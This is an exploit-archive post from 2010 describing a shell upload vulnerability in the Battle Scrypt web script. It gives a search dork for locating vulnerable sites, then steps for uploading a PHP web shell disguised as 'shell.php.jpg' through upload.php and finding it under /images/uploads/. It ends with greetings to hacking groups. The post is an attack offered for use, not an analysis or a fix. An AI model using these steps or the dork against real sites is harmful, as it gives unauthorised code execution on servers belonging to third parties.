Battle Scrypt Shell Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Battle Scrypt Shell Upload Vulnerability
# Published : 2010-05-19
# Author : DigitALL
# Previous Title : webYourPhotos <==6.05 (index.php) Remote File Inclusion Vulnerability
# Next Title : Web Administration Broken Access Control in McAfee Email Gateway

# Exploit Title: Battle Scrypt Shell Upload Vulnerability

# Date: 19.05.2010

# Author: DigitALL

# Software Link:
http://www.scrypted.com/battlescrypt.html

# Tested on: Windows Xp Sp3

# Code :

d0rk: "Powered by Battle Scrypt" or inurl:upload.php For Script Kidde :)

Exploit: Go To /upload.php Your Shell shell.php.jpg And Shell Upload.And
Display* stats.php?id=[id]*

Your Shell Link : /images/uploads/[id].php

Gr33tz Thanks: Efe KroNicKq NoFearx38 and All 1923Turk.Com Members

Site's: // www.digitallsecurity.org // digit4ll.blogspot.com //
www.hacker-zone.org // www.katliam.org // www.sirperdesi.org //
www.kankardes.com //